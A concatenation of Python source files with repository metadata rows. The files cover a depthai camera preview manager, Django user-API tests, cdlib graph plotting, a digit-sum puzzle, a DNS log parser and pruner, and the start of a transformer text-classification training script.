dispMultiplier (float, Optional): Multiplier used for depth <-> disparity calculations (calculated on baseline and focal)
depthConfig (depthai.StereoDepthConfig, optional): Configuration used for depth <-> disparity calculations
createWindows (bool, Optional): If True, will create preview windows using OpenCV (enabled by default)
"""
self.sync = sync
self.nnSource = nnSource
self.colorMap = colorMap
self.lowBandwidth = lowBandwidth
self.scale = scale
self.dispMultiplier = dispMultiplier
self._depthConfig = depthConfig
self._fpsHandler = fpsHandler
self._mouseTracker = MouseClickTracker() if mouseTracker else None
self._display = display
self._createWindows = createWindows
self._rawFrames = {}
def collectCalibData(self, device):
"""
Collects calibration data and calculates :attr:`dispScaleFactor` accordingly
Args:
device (depthai.Device): Running device instance
"""
calib = device.readCalibration()
eeprom = calib.getEepromData()
leftCam = calib.getStereoLeftCameraId()
if leftCam != dai.CameraBoardSocket.AUTO:
camInfo = eeprom.cameraData[leftCam]
self.baseline = abs(camInfo.extrinsics.specTranslation.x * 10) # cm -> mm
self.fov = calib.getFov(calib.getStereoLeftCameraId())
self.focal = (camInfo.width / 2) / (2. * math.tan(math.radians(self.fov / 2)))
else:
print("Warning: calibration data missing, using OAK-D defaults")
self.baseline = 75
self.fov = 71.86
self.focal = 440
self.dispScaleFactor = self.baseline * self.focal
def createQueues(self, device, callback=None):
"""
Create output queues for requested preview streams
Args:
device (depthai.Device): Running device instance
callback (func, Optional): Function that will be executed with preview name once preview window was created
"""
self.outputQueues = []
for name in self._display:
if self._createWindows:
cv2.namedWindow(name)
if callable(callback):
callback(name)
if self._createWindows and self._mouseTracker is not None:
cv2.setMouseCallback(name, self._mouseTracker.selectPoint(name))
if name not in (Previews.disparityColor.name, Previews.depth.name): # generated on host
self.outputQueues.append(device.getOutputQueue(name=name, maxSize=1, blocking=False))
if Previews.disparityColor.name in self._display and Previews.disparity.name not in self._display:
self.outputQueues.append(device.getOutputQueue(name=Previews.disparity.name, maxSize=1, blocking=False))
if Previews.depth.name in self._display and Previews.depthRaw.name not in self._display:
self.outputQueues.append(device.getOutputQueue(name=Previews.depthRaw.name, maxSize=1, blocking=False))
def closeQueues(self):
"""
Closes output queues for requested preview streams
"""
for queue in self.outputQueues:
queue.close()
def prepareFrames(self, blocking=False, callback=None):
"""
This function consumes output queues' packets and parses them to obtain ready to use frames.
To convert the frames from packets, this manager uses methods defined in :obj:`depthai_sdk.previews.PreviewDecoder`.
Args:
blocking (bool, Optional): If set to :code:`True`, will wait for a packet in each queue to be available
callback (func, Optional): Function that will be executed once packet with frame has arrived
"""
for queue in self.outputQueues:
if blocking:
packet = queue.get()
else:
packet = queue.tryGet()
if packet is not None:
if self._fpsHandler is not None:
self._fpsHandler.tick(queue.getName())
frame = getattr(Previews, queue.getName()).value(packet, self)
if frame is None:
print("[WARNING] Conversion of the {} frame has failed! (None value detected)".format(queue.getName()))
continue
if self.scale is not None and queue.getName() in self.scale:
h, w = frame.shape[0:2]
frame = cv2.resize(frame, (int(w * self.scale[queue.getName()]), int(h * self.scale[queue.getName()])), interpolation=cv2.INTER_AREA)
if queue.getName() in self._display:
if callback is not None:
callback(frame, queue.getName())
self._rawFrames[queue.getName()] = frame
if self._mouseTracker is not None:
if queue.getName() == Previews.disparity.name:
rawFrame = packet.getFrame() if not self.lowBandwidth else cv2.imdecode(packet.getData(), cv2.IMREAD_GRAYSCALE)
self._mouseTracker.extractValue(Previews.disparity.name, rawFrame)
self._mouseTracker.extractValue(Previews.disparityColor.name, rawFrame)
if queue.getName() == Previews.depthRaw.name:
rawFrame = packet.getFrame() # if not self.lowBandwidth else cv2.imdecode(packet.getData(), cv2.IMREAD_UNCHANGED) TODO uncomment once depth encoding is possible
self._mouseTracker.extractValue(Previews.depthRaw.name, rawFrame)
self._mouseTracker.extractValue(Previews.depth.name, rawFrame)
else:
self._mouseTracker.extractValue(queue.getName(), frame)
if queue.getName() == Previews.disparity.name and Previews.disparityColor.name in self._display:
if self._fpsHandler is not None:
self._fpsHandler.tick(Previews.disparityColor.name)
self._rawFrames[Previews.disparityColor.name] = Previews.disparityColor.value(frame, self)
if queue.getName() == Previews.depthRaw.name and Previews.depth.name in self._display:
if self._fpsHandler is not None:
self._fpsHandler.tick(Previews.depth.name)
self._rawFrames[Previews.depth.name] = Previews.depth.value(frame, self)
for name in self._rawFrames:
newFrame = self._rawFrames[name].copy()
if name == Previews.depthRaw.name:
newFrame = cv2.normalize(newFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
self.frames[name] = newFrame
def showFrames(self, callback=None):
"""
Displays stored frame onto preview windows.
Args:
callback (func, Optional): Function that will be executed right before :code:`cv2.imshow`
"""
for name, frame in self.frames.items():
if self._mouseTracker is not None:
point = self._mouseTracker.points.get(name)
value = self._mouseTracker.values.get(name)
if point is not None:
cv2.circle(frame, point, 3, (255, 255, 255), -1)
cv2.putText(frame, str(value), (point[0] + 5, point[1] + 5), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 0, 0), 4, cv2.LINE_AA)
cv2.putText(frame, str(value), (point[0] + 5, point[1] + 5), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
if callable(callback):
newFrame = callback(frame, name)
if newFrame is not None:
frame = newFrame
if self._createWindows:
cv2.imshow(name, frame)
def has(self, name):
"""
Determines whether manager has a frame assigned to specified preview
Returns:
bool: :code:`True` if contains a frame, :code:`False` otherwise
"""
return name in self.frames
def get(self, name):
"""
Returns a frame assigned to specified preview
Returns:
numpy.ndarray: Resolved frame, will default to :code:`None` if not present
"""
return self.frames.get(name, None)
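# --- Hypothetical usage sketch (added; not part of the original module) ---
# Assumes a depthai pipeline with a preview stream such as Previews.color has already
# been built elsewhere; the names below are illustrative only.
#
#   pm = PreviewManager(display=[Previews.color.name], mouseTracker=True)
#   with dai.Device(pipeline) as device:
#       pm.collectCalibData(device)
#       pm.createQueues(device)
#       while True:
#           pm.prepareFrames()
#           pm.showFrames()
#           if cv2.waitKey(1) == ord('q'):
#               break
#       pm.closeQueues()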
| 51.097436 | 219 | 0.621738 | 1,114 | 9,964 | 5.508977 | 0.265709 | 0.013687 | 0.016132 | 0.01385 | 0.299658 | 0.268535 | 0.181359 | 0.142904 | 0.100212 | 0.093205 | 0 | 0.012866 | 0.290145 | 9,964 | 194 | 220 | 51.360825 | 0.8548 | 0.284725 | 0 | 0.121739 | 0 | 0 | 0.018612 | 0 | 0 | 0 | 0 | 0.005155 | 0 | 1 | 0.069565 | false | 0 | 0.034783 | 0 | 0.13913 | 0.017391 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620aba71ed54ba7a38335320b77cef0075b92456 | 2,823 | py | Python | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | null | null | null | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | 8 | 2020-12-03T15:15:32.000Z | 2022-03-12T00:58:27.000Z | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | 1 | 2021-04-09T16:17:11.000Z | 2021-04-09T16:17:11.000Z | from rest_framework_simplejwt.tokens import RefreshToken
from rest_framework.test import APITestCase
from rest_framework import status
from django.urls import reverse
from model_bakery import baker
class TestUserAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_url = reverse('user')
cls.user = baker.make('backend.VibroUser')
cls.refresh = str(RefreshToken.for_user(cls.user).access_token)
def test_get_method_is_allowed_with_authenticated_user(self):
"""
assert any authenticated user is
allowed to retrieve their user data.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.get(self.user_url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data['id'], self.user.id)
self.assertEqual(res.data['username'], self.user.username)
self.assertEqual(res.data['email'], self.user.email)
self.assertEqual(res.data['company'], self.user.company)
self.assertEqual(res.data['user_type'], self.user.user_type)
self.assertEqual(res.data['is_staff'], self.user.is_staff)
self.assertEqual(res.data['is_superuser'], self.user.is_superuser)
def test_get_method_is_not_allowed_with_unauthenticated_user(self):
"""
assert non authenticated users
can not access user data.
"""
res = self.client.get(self.user_url)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_method_is_not_allowed(self):
"""
assert post method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.post(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_method_is_not_allowed(self):
"""
assert delete method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.delete(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_patch_method_is_not_allowed(self):
"""
assert patch method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.patch(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_put_method_is_not_allowed(self):
"""
assert put method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.put(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
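# --- Hypothetical invocation note (added; not part of the original test module) ---
# With Django's test runner configured for this project, this suite would typically be
# run with something like (dotted path assumed from the repository layout):
#   python manage.py test backend.tests.authentication_views.user_api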
| 36.662338 | 77 | 0.691463 | 364 | 2,823 | 5.126374 | 0.206044 | 0.055734 | 0.125402 | 0.086817 | 0.567524 | 0.522508 | 0.443194 | 0.443194 | 0.443194 | 0.443194 | 0 | 0.008021 | 0.205101 | 2,823 | 76 | 78 | 37.144737 | 0.823529 | 0.094934 | 0 | 0.268293 | 0 | 0 | 0.07375 | 0 | 0 | 0 | 0 | 0 | 0.317073 | 1 | 0.170732 | false | 0 | 0.121951 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620fc6ee7f3085e8c764587654dd61e82be6309d | 4,003 | py | Python | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | 1 | 2020-09-07T10:03:11.000Z | 2020-09-07T10:03:11.000Z | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | null | null | null | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | null | null | null | import matplotlib.pyplot as plt
import networkx as nx
from cdlib import NodeClustering
from cdlib.utils import convert_graph_formats
from community import induced_graph
__all__ = ["plot_network_clusters", "plot_community_graph"]
COLOR = ['r', 'b', 'g', 'c', 'm', 'y', 'k',
'0.8', '0.2', '0.6', '0.4', '0.7', '0.3', '0.9', '0.1', '0.5']
def plot_network_clusters(graph, partition, position, figsize=(8, 8), node_size=200, plot_overlaps=False,
plot_labels=False):
"""
Plot a graph with node color coding for communities.
:param graph: NetworkX/igraph graph
:param partition: NodeClustering object
:param position: A dictionary with nodes as keys and positions as values. Example: networkx.fruchterman_reingold_layout(G)
:param figsize: the figure size; it is a pair of float, default (8, 8)
:param node_size: int, default 200
:param plot_overlaps: bool, default False. Flag to control if multiple algorithms memberships are plotted.
:param plot_labels: bool, default False. Flag to control if node labels are plotted.
Example:
>>> from cdlib import algorithms, viz
>>> import networkx as nx
>>> g = nx.karate_club_graph()
>>> coms = algorithms.louvain(g)
>>> pos = nx.spring_layout(g)
>>> viz.plot_network_clusters(g, coms, pos)
"""
partition = partition.communities
graph = convert_graph_formats(graph, nx.Graph)
n_communities = min(len(partition), len(COLOR))
plt.figure(figsize=figsize)
plt.axis('off')
fig = nx.draw_networkx_nodes(graph, position, node_size=node_size, node_color='w')
fig.set_edgecolor('k')
nx.draw_networkx_edges(graph, position, alpha=.5)
for i in range(n_communities):
if len(partition[i]) > 0:
if plot_overlaps:
size = (n_communities - i) * node_size
else:
size = node_size
fig = nx.draw_networkx_nodes(graph, position, node_size=size,
nodelist=partition[i], node_color=COLOR[i])
fig.set_edgecolor('k')
if plot_labels:
nx.draw_networkx_labels(graph, position, labels={node: str(node) for node in graph.nodes()})
return fig
def plot_community_graph(graph, partition, figsize=(8, 8), node_size=200, plot_overlaps=False, plot_labels=False):
"""
    Plot a community graph with node color coding for communities.
:param graph: NetworkX/igraph graph
:param partition: NodeClustering object
:param figsize: the figure size; it is a pair of float, default (8, 8)
:param node_size: int, default 200
:param plot_overlaps: bool, default False. Flag to control if multiple algorithms memberships are plotted.
:param plot_labels: bool, default False. Flag to control if node labels are plotted.
Example:
>>> from cdlib import algorithms, viz
>>> import networkx as nx
>>> g = nx.karate_club_graph()
>>> coms = algorithms.louvain(g)
>>> viz.plot_community_graph(g, coms)
"""
cms = partition.communities
node_to_com = {}
for cid, com in enumerate(cms):
for node in com:
if node not in node_to_com:
node_to_com[node] = cid
else:
# duplicating overlapped node
alias = "%s_%s" % (node, cid)
node_to_com[alias] = cid
edges = [(alias, y) for y in graph.neighbors(node)]
graph.add_edges_from(edges)
# handling partial coverage
s = nx.subgraph(graph, node_to_com.keys())
# algorithms graph construction
c_graph = induced_graph(node_to_com, s)
node_cms = [[node] for node in c_graph.nodes()]
return plot_network_clusters(c_graph, NodeClustering(node_cms, None, ""), nx.spring_layout(c_graph), figsize=figsize,
node_size=node_size, plot_overlaps=plot_overlaps, plot_labels=plot_labels)
| 37.764151 | 126 | 0.641019 | 535 | 4,003 | 4.62243 | 0.239252 | 0.035584 | 0.021836 | 0.032349 | 0.42499 | 0.42499 | 0.42499 | 0.42499 | 0.42499 | 0.390214 | 0 | 0.013396 | 0.254059 | 4,003 | 105 | 127 | 38.12381 | 0.814802 | 0.365726 | 0 | 0.085106 | 0 | 0 | 0.036705 | 0.008963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.106383 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620fd414668160b671194271d3ab3f1f144ddd9d | 801 | py | Python | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | #User function Template for python3
def RulingPair(arr, n):
    # Group the numbers by their digit sum: d maps digit-sum -> list of numbers
    d = dict()
    for i in arr:
        s = str(i)
        x = 0
        for j in range(len(s)):
            x = x + int(s[j])
        if x not in d:
            d[x] = [i]
        else:
            d[x].append(i)
    # For each digit-sum group with at least two numbers, the best candidate is
    # the sum of its two largest members; keep the overall maximum (-1 if none)
    maxi = -1
    for i in d:
        if len(d[i]) > 1:
            x1 = d[i].index(max(d[i]))          # position of the largest number
            x = d[i][x1]
            d[i] = d[i][:x1] + d[i][x1 + 1:]    # remove it, then take the next largest
            x = x + max(d[i])
            maxi = max(maxi, x)
    return maxi
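# --- Illustrative worked example (added; not part of the original solution) ---
# For arr = [55, 23, 32, 46, 88]:
#   digit sums -> {10: [55, 46], 5: [23, 32], 16: [88]}
#   groups with two or more members give candidate sums 55+46=101 and 23+32=55,
#   so RulingPair returns 101.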
#{
# Driver Code Starts
#Initial Template for Python 3
if __name__ == '__main__':
t = int(input())
for _ in range(t):
n = int(input())
arr = list(map(int, input().strip().split()))
print(RulingPair(arr,n))
# } Driver Code Ends | 19.071429 | 53 | 0.440699 | 124 | 801 | 2.774194 | 0.395161 | 0.046512 | 0.034884 | 0.02907 | 0.034884 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 0.394507 | 801 | 42 | 54 | 19.071429 | 0.68866 | 0.142322 | 0 | 0 | 0 | 0 | 0.01173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62109e38a7addafd546b1520fe1722f2442a523e | 8,864 | py | Python | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | import re #check valid Domain/String
from datetime import datetime #running time
from ipaddress import ip_address #check valid ip
import sys #Eception information
#True if data is valid
def ValidDomain(Domain):
#Valid Domain
    DomainSize = len(Domain) >= 2 and len(Domain) <= 255 # 2 <= Domain length <= 255
DomainChar = re.search("[^a-zA-Z0-9\.\-]",Domain) == None #Only a-z/A-Z, 0-9,-,.
DomainFirst = re.search("[a-zA-Z0-9]",Domain[0]) #Only a-zA-Z0-9
DomainLast = Domain[-1] != "-" and Domain[-1] != "." #Not - or .
#max 63 per label
return DomainSize and DomainChar and DomainFirst and DomainLast
def ValidIP(IP):
try:
result = ip_address(IP)
return True
except: #ValueError Exception
return False
def Answer2IP(Answer):
answers = Answer.split(",") #potential multiple ips
result = [] #<string>
for a in answers:
#check IP addresses
if(ValidIP(a)):
result.append(a)
#print(result)
return result
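# --- Illustrative examples (added for clarity; not part of the original module) ---
# ValidIP("10.0.0.1")  -> True          ValidIP("999.1.1.1") -> False
# ValidDomain("example.com") is truthy; ValidDomain("x" * 300) is falsy (too long)
# Answer2IP("10.0.0.1,example.net,10.0.0.2") -> ["10.0.0.1", "10.0.0.2"]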
def ReadInLogs(LogList,clean=True):
ReadinLogDict = dict() #MixIdentifier[id.orig_h+id.orig_p+id.resp_h+id.resp_p+trans_id]<String>:List<Strings>[Client,Domain,IPs]
DomainDict = dict() #Domains<string>:appeared times<int>
ClientDict = dict() #Client<string>: appeared times<list<string>>
IPDict = dict() #IP<string>: Domain<string>
RL = []#Record List Store a list of [DOmain,Client,IPs] for build other dictionary
TotalLine = 0
ValidLine = 0
for Log in LogList:
#print(Log)
try:
with open(Log,"r") as LogData:
Data = LogData.readlines()
print("Inputing {} lines ... ".format(len(Data)))
for line in Data:
if(line[0] == "#"):
continue #ignore first line
#print(line)
TotalLine += 1
dline = line.strip().split("\t") #require given format, otherwise throw exception
IDKey = dline[2]+dline[3]+dline[4]+dline[5]+dline[7]
Client = dline[2]
Domain = dline[9]
IPList = Answer2IP(dline[21])
updateFlag = False #determine if can updates
if(Domain == "-" and len(IPList) < 1):
continue #ignore such log
if(IDKey in ReadinLogDict):
#update Domian
if(ReadinLogDict.get(IDKey)[1] == "-" and ValidDomain(Domain)):
ReadinLogDict[IDKey][1] = Domain
IPList = ReadinLogDict[IDKey][2]
updateFlag = True
ValidLine += 2 #need two logs
#print("C1-")
#update IPs from Answer
if(len(ReadinLogDict.get(IDKey)[2]) == 0 and len(IPList) > 0): #at least one valid IP
ReadinLogDict[IDKey][2] = IPList
Domain = ReadinLogDict[IDKey][1]
updateFlag = True
ValidLine += 2 #need two logs
#print("C2-")
else:
if((Domain == "-" or ValidDomain(Domain)) and (ValidIP(Client) or dline[21] == "-")):
#Client should be valid; Domain either valid or empty
ReadinLogDict[IDKey] = [Client,Domain,IPList]
updateFlag = (Domain != "-" and len(IPList) > 0)
ValidLine += 1
#print("C3")
#if both domian and IPs exists, update to other dictoionaries
#if(IDKey in ReadinLogDict and not updateFlag):
#print(IDKey)
#print(ReadinLogDict[IDKey])
if(updateFlag):
#if(IDKey in ReadinLogDict):
#print(IDKey)
#print(ReadinLogDict[IDKey])
RL.append([Domain,Client,IPList])
#Domain
if(Domain not in DomainDict):
DomainDict[Domain] = 0
DomainDict[Domain] += 1
#Client
if(Client not in ClientDict):
ClientDict[Client] = 0
ClientDict[Client] += 1
#IPs
for ip in IPList:
if(ip not in IPDict):
IPDict[ip] = []
IPDict[ip].append(Domain)
except IOError as Error:
print("ERROR: I/O error {} CHECK INPUT FILE NAME AND ADDRESS".format(Error))
except:
print("ERROR: {}".format(sys.exc_info()[0]))
    percent = 0
    if(TotalLine != 0): percent = (ValidLine/TotalLine)*100
    print("Read in {} logs; {} ({:.3f}%) logs are useful (contain valid domain/client/ips)".format(TotalLine,ValidLine,percent))
print("Valid Domains: {}\nValid Clients: {}\nValid IPs: {}".format(len(DomainDict),len(ClientDict),len(IPDict)))
    # only return cleaned clients, domains, ips
return (RL,DomainDict,ClientDict,IPDict,TotalLine)
#Output three dict contain valid Client,Domain,IPs and their No.
#Domain Dict No<int>:Domain<String>
#Client Dict No<int>:Client<String>
#IP Dict No<ing>: IP<String>
def Prun(DomainDict,ClientDict,IPDict,TotalCall,kd=1,ka=1,kc=1): #default settings: ka=0.25, kb=0.001, kc=3
#make sure input isn't empty
if(len(DomainDict) < 1 or len(ClientDict) < 1 or len(IPDict) < 1):
return None
MaxDomain = len(DomainDict)*kd #popular domain
MaxClient = TotalCall*ka #busy client
#print(MaxDomain," ",MaxClient)
DomainNo = dict()
ClientNo = dict()
IPNo = dict()
#Domain
index = 0 #may adjusted
for domain in DomainDict:
if(DomainDict.get(domain) < MaxDomain):
DomainNo[index] = domain
index += 1
#Client
index = 0
for client in ClientDict:
cNum = ClientDict.get(client)
if(cNum < MaxClient and cNum >= kc):
ClientNo[index] = client
index += 1
#IP
index = 0
for ip in IPDict:
if(len(IPDict.get(ip)) > 1):
IPNo[index] = ip
index += 1
#any of the empty dict should no reach here
dp = (len(DomainNo)/len(DomainDict))*100
cp = (len(ClientNo)/len(ClientDict))*100
ipp = (len(IPNo)/len(IPDict))*100
print("Pruned Data:\nDomain: {} ({:.3f}% remain)\nClient: {}({:.3f}% remain)\nIP: {}({:.3f}% remain)".format(len(DomainNo),dp,len(ClientNo),cp,len(IPNo),ipp))
return (DomainNo,ClientNo,IPNo)
def GenerateWL(LogLists,kd=1,ka=1,kc=1,cleanFlag=True,prunFlag=True,ShowTime=True):
st = datetime.now()
RL,DD,CD,IPD,TCalls = ReadInLogs(LogLists,cleanFlag)
et = datetime.now()
tt = et - st
print()
if(ShowTime):print("Read in cost:{}".format(tt))
#No empty dictionary
if(len(DD) > 0 and len(CD) > 0 and len(IPD) > 0):
print()
print("Data {} Cleaned. Start pruning ... ".format(TCalls))
if(prunFlag):
st = datetime.now()
Nos = Prun(DD,CD,IPD,TCalls,kd,ka,kc)
et = datetime.now()
tt = et - st
print()
if(ShowTime):print("Purn cost:{}".format(tt))
return (RL,Nos)
else:
return None
def GenerateDomain2IP(RL,DD,IPD):
Domain2IP = dict()
Domains = list(DD.values())
IPs = list(IPD.values())
    # initialization
for dd in Domains:
Domain2IP[dd] = []
for record in RL:
if(record[0] in Domain2IP): #valid domain
for ip in record[2]:
if(ip in IPs): Domain2IP[record[0]].append(ip)
result = {key:list(set(val)) for key, val in Domain2IP.items() if len(val) > 0}
return result
if "__name__" == "__main__":
RL,TD = GenerateWL(["2021-02-09_dns.01:00:00-02:00:00.log"])#,kd=0.25,ka=0.001,kc=3)
DD,CD,IPD = TD
st = datetime.now()
D2IP = GenerateDomain2IP(RL,DD,IPD)
et = datetime.now()
tt = et - st
print("Time cost {}".format(tt))
print("Dictionary size {}".format(len(D2IP)))
#print(RL)
#for dip in D2IP:
# print("{}: {}".format(dip,D2IP.get(dip)))
#for dd in DD:
# print("[{}] {}".format(DD[dd],dd))
| 33.832061 | 162 | 0.5088 | 989 | 8,864 | 4.542973 | 0.252781 | 0.028044 | 0.003339 | 0.004006 | 0.068106 | 0.053416 | 0.04941 | 0.035166 | 0.01736 | 0.01736 | 0 | 0.026203 | 0.367103 | 8,864 | 261 | 163 | 33.961686 | 0.774688 | 0.192013 | 0 | 0.219355 | 0 | 0.012903 | 0.068951 | 0.005076 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045161 | false | 0 | 0.025806 | 0 | 0.135484 | 0.090323 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6212ed730ff6390351c6a821151048f3e1ac283a | 12,255 | py | Python | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | 2 | 2021-09-15T07:23:46.000Z | 2021-09-15T07:43:08.000Z | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | null | null | null | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | 1 | 2021-09-15T07:23:27.000Z | 2021-09-15T07:23:27.000Z | import numpy as np
import pandas as pd
import csv
import os
import glob
import pandas as pd
from torch.utils.data import TensorDataset
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import AdamW, get_linear_schedule_with_warmup
import argparse
from sklearn.model_selection import train_test_split
import torch
import torch.nn as nn
from tqdm import tqdm
import json
from util import f1_score_func, accuracy_per_class
import util
import logging
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='roberta-base', help="model name from huggingface")
parser.add_argument('--experiment_name', default='sample-roberta-training-properly', help="name of the experiment; also used as the output/log directory") #sample-try-with-bert-base
parser.add_argument('--used_tokenized_data', type=bool, default=False, help="load previously saved (pickled) tokenized data for faster startup")
parser.add_argument("--epochs", type=int, default=5)
parser.add_argument("--batch_size_train", type=int, default=32)
parser.add_argument("--batch_size_val", type=int, default=32)
parser.add_argument("--dummy", type=bool, default=False)
parser.add_argument("--full_finetuning", type=bool, default=True)
parser.add_argument("--loading_from_prev_pretrain", type=bool, default=False)
parser.add_argument("--trained_model", default="sample-distilbert-run2/finetuned_BERT_epoch_1.model")
def evaluate(dataloader_val, model):
model.eval()
loss_val_total = 0
predictions, true_vals = [], []
for batch in dataloader_val:
batch = tuple(b.to(0) for b in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[2],
}
with torch.no_grad():
outputs = model(**inputs)
loss = outputs[0]
loss = loss.mean()
logits = outputs[1]
loss_val_total += loss.item()
logits = logits.detach().cpu().numpy()
label_ids = inputs['labels'].cpu().numpy()
predictions.append(logits)
true_vals.append(label_ids)
loss_val_avg = loss_val_total/len(dataloader_val)
predictions = np.concatenate(predictions, axis=0)
true_vals = np.concatenate(true_vals, axis=0)
return loss_val_avg, predictions, true_vals
if (__name__ == "__main__"):
args = parser.parse_args()
exp_name = args.experiment_name
    # log the parsed argument fields
#assert Path("./"+exp_name).exists()
os.mkdir(exp_name)
util.set_logger(os.path.join(exp_name, 'train.log'))
logging.info("Training Arguments: {}" .format(args))
try:
os.system("nvidia-smi")
except:
print("Something went wrong with nvidia-smi command")
logging.info("loading all the files of data")
# logging tokeinzer used
tokenizer = AutoTokenizer.from_pretrained(args.model)
logging.info("Used tokenizer: {}".format(tokenizer))
# directly loading tokenized data from from pickle
if args.used_tokenized_data:
logging.info("loading tokenized data")
encoded_data_train = torch.load("data/tokenized/encoded_data_train.pt")
encoded_data_val = torch.load("data/tokenized/encoded_data_val.pt")
else:
#filenames = [name for name in glob.glob('./data/dataset/train.csv')]
filenames = ["custum-data/val.csv", "custum-data/train.csv"]
df = pd.concat( [ pd.read_csv(f, low_memory=False) for f in filenames ] )
        column_map = {'desc': 'BULLET_POINTS',
                      'BROWSE_NODE_ID': 'BROWSE_NODE_ID'}
        # rename columns so downstream code can rely on BULLET_POINTS / BROWSE_NODE_ID
        df.rename(columns=column_map,
                  inplace=True)
#df = pd.read_csv("./data/dataset/train.csv", escapechar = "\\", quoting = csv.QUOTE_NONE)
if (args.dummy):
# logging
logging.info("dummy data")
df = df[:400]
#df = df[["BULLET_POINTS", "BROWSE_NODE_ID"]]
#df = pd.concat( [ pd.read_csv(f, sep='\t', names=['id', 'BROWSE_NODE_ID','BULLET_POINTS']) for f in filenames ] )
logging.info("Loaded sucessfull")
possible_labels = df.BROWSE_NODE_ID.unique()
label_dict = {}
for index, possible_label in enumerate(possible_labels):
label_dict[possible_label] = index
#os.path.join(exp_name, 'params.json')
